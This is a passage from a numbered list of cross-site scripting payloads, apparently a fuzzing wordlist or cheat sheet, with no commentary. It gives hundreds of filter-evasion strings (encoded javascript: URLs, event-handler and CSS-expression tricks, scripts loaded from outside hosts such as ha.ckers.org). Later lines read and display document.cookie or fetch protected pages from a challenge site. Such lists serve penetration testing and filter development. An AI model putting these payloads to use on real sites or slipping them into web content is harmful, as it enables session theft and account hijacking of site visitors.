  410. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
  411. <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
  412. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
  413. <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
  414. <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
  415. <TABLE BACKGROUND="javascript:alert('XSS')">
  416. <TABLE><TD BACKGROUND="javascript:alert('XSS')">
  417. <DIV STYLE="background-image: url(javascript:alert('XSS'))">
  418. <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
  419. <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
  420. <DIV STYLE="width: expression(alert('XSS'));">
  421. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
  422. <IMG STYLE="xss:expr/*XSS*ession(alert('XSS'))">
  423. <XSS STYLE="xss:expression(alert('XSS'))">
  424. exp/*<A STYLE='no\xss:noxss("**");
  425. xss:&#101;x&#x2F;*XSS*//**pression(alert("XSS"))'>
  426. <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
  427. <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
  428. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  429. <!--[if gte IE 4]>
  430. <SCRIPT>alert('XSS');</SCRIPT>
  431. <![endif]-->
  432. <BASE HREF="javascript:alert('XSS');//">
  433. <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
  434. <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
  435. <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
  436. <HTML xmlns:xss>
  437. <?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
  438. <xss:xss>XSS</xss:xss>
  439. </HTML>
  440. <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
  441. </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
  442. <XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></XML>
  443. <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
  444. <XML SRC="xsstest.xml" ID=I></XML>
  445. <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
  446. <HTML><BODY>
  447. <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
  448. <?import namespace="t" implementation="#default#time2">
  449. <t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;">
  450. </BODY></HTML>
  451. <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
  452. <META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;">
  453. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD><SCRIPT>alert('XSS');</SCRIPT>
  454. <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  455. <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  456. <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  457. <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  458. <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  459. <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  460. <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  461. <A HREF="http://66.102.7.147/">XSS</A>
  462. <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
  463. <A HREF="http://1113982867/">XSS</A>
  464. <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
  465. <A HREF="http://0102.0146.0007.00000223/">XSS</A>
  466. <A HREF="h
  467. tt  p://6&#9;6.000146.0x7.147/">XSS</A>
  468. <A HREF="//www.google.com/">XSS</A>
  469. <A HREF="//google">XSS</A>
  470. <A HREF="http://ha.ckers.org@google">XSS</A>
  471. <A HREF="http://google:ha.ckers.org">XSS</A>
  472. <A HREF="http://google.com/">XSS</A>
  473. <A HREF="http://www.google.com./">XSS</A>
  474. <A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
  475. <A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
  476.  
  477. <iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>
  478.  
  479. <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
  480.  
  481. <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
  482.  
  483. <sVg><scRipt %00>alert&lpar;1&rpar; {Opera}
  484.  
  485. <img/src=`%00` onerror=this.onerror=confirm
  486.  
  487. <form><isindex formaction="javascript&colon;confirm(1)"
  488.  
  489. <img src=`%00`&NewLine; onerror=alert(1)&NewLine;
  490.  
  491. <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
  492.  
  493. <ScRipT 5-0*3?=>prompt(1)</ScRipT giveanswerhere=?
  494.  
  495. <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
  496.  
  497. <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
  498.  
  499. &#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00
  500.  
  501. <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
  502.  
  503. <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
  504.  
  505. <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
  506.  
  507. <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
  508.  
  509. <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
  510.  
  511. <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
  512.  
  513. <form><a href="javascript:\u0061lert&#x28;1&#x29;">X
  514.  
  515. </script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'>
  516.  
  517. <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
  518.  
  519. <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
  520.  
  521. <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a
  522.  
  523. http://www.google<script .com>alert(document.location)</script
  524.  
  525. <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
  526.  
  527. <img/src=@&#32;&#13; onerror = prompt('&#49;')
  528.  
  529. <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
  530.  
  531. <script ^__^>alert(String.fromCharCode(49))</script ^__^
  532.  
  533. </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(
  534.  
  535. &#00;</form><input type&#61;"date" onfocus="alert(1)">
  536.  
  537. <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>
  538.  
  539. <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
  540.  
  541. <iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
  542.  
  543. <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
  544.  
  545. <script ~~~>alert(0%0)</script ~~~>
  546.  
  547. <style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
  548.  
  549. <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
  550.  
  551. <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
  552.  
  553. &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
  554.  
  555. &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
  556.  
  557. <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
  558.  
  559. <div/style="width:expression(confirm(1))">X</div> {IE7}
  560.  
  561. <iframe/%00/ src=javaSCRIPT&colon;alert(1)
  562.  
  563. //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
  564.  
  565. /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt/*iframe/src*/>
  566.  
  567. //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
  568.  
  569. </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
  570.  
  571. <a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
  572.  
  573. </plaintext\></|\><plaintext/onmouseover=prompt(1)
  574.  
  575. </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}
  576.  
  577. <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
  578.  
  579. <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
  580.  
  581. <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
  582.  
  583. <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
  584.  
  585. <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
  586.  
  587. <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
  588.  
  589. <var onmouseover="prompt(1)">On Mouse Over</var>
  590.  
  591. <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
  592.  
  593. <img src="/" =_=" title="onerror='prompt(1)'">
  594.  
  595. <%<!--'%><script>alert(1);</script -->
  596.  
  597. <script src="data:text/javascript,alert(1)"></script>
  598.  
  599. <iframe/src \/\/onload = prompt(1)
  600.  
  601. <iframe/onreadystatechange=alert(1)
  602.  
  603. <svg/onload=alert(1)
  604.  
  605. <input value=<><iframe/src=javascript:confirm(1)
  606.  
  607. <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
  608.  
  609. http://www.<script>alert(1)</script .com
  610.  
  611. <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
  612.  
  613. <svg><script ?>alert(1)
  614.  
  615. <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
  616.  
  617. <img src=`xx:xx`onerror=alert(1)>
  618.  
  619. <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
  620.  
  621. <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
  622.  
  623. <math><a xlink:href="//jsfiddle.net/t846h/">click
  624.  
  625. <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
  626.  
  627. <svg contentScriptType=text/vbs><script>MsgBox
  628.  
  629. <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
  630.  
  631. <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u006worksinIE>
  632.  
  633. <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U
  634.  
  635. <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
  636.  
  637. <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
  638.  
  639. <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
  640.  
  641. <script>++1-+?(1)</script>
  642.  
  643. <body/onload=&lt;!--&gt;&#10alert(1)>
  644.  
  645. <script itworksinallbrowsers>/*<script* */alert(1)</script
  646.  
  647. <img src ?itworksonchrome?\/onerror = alert(1)
  648.  
  649. <svg><script>//&NewLine;confirm(1);</script </svg>
  650.  
  651. <svg><script onlypossibleinopera:-)> alert(1)
  652.  
  653. <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
  654.  
  655. <script x> alert</script 1=2
  656.  
  657. <div/onmouseover='alert(1)'> style="x:">
  658.  
  659. <--`<img/src=` onerror=alert(1)> --!>
  660.  
  661. <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
  662.  
  663. <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
  664.  
  665. "><img src=x onerror=window.open('https://www.google.com/');>
  666.  
  667. <form><button formaction=javascript&colon;alert(1)>CLICKME
  668.  
  669. <math><a xlink:href="//jsfiddle.net/t846h/">click
  670.  
  671. <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik></object>
  672.  
  673. <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
  674.  
  675. 1<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
  676.  
  677. '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
  678. <<scr\0ipt/src=http://xss.com/xss.js></script
  679. %27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E
  680. ' onmouseover=alert(/Black.Spook/)
  681. "><iframe%20src="http://google.com"%%203E
  682. '<script>window.onload=function(){document.forms[0].message.value='1';}</script>
  683. x”</title><img src%3dx onerror%3dalert(1)>
  684. <script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script>
  685. <script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>
  686. <script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script>
  687. <script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script>
  688. <script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
  689. <script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script>
  690. <script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script>
  691. <script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script>
  692. <%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74>
  693. <script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script>
  694. <iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script>
  695. <script>alert(document.head.innerHTML.substr(146,20));</script>
  696. <script>alert(document.head.childNodes[3].text)</script>
  697. <script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script>
  698. <script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script>
  699. <script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script>
  700. <script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script>
  701. <script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>
  702. <script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script>
  703. <script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>
  704. <script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script>
  705. <iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>
  706. <script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>
  707. <img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #
  708. <script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #
  709. <SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#
  710. <script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>#
  711. <video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23
  712. <script for=document event=onreadystatechange>getElementById('safe123').click()</script>
  713. <script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script>
  714. <script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script>
  715. <iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
  716. <iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
  717. <iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
  718. <iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
  719. <script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script>#
  720. <iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
  721. <textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
  722. <textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea>
  723. <iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
  724. <textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
  725. <script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
  726. <textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea>
  727. <object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>
  728. <script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
  729. %3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E
  730. <iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>
  731. <a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E
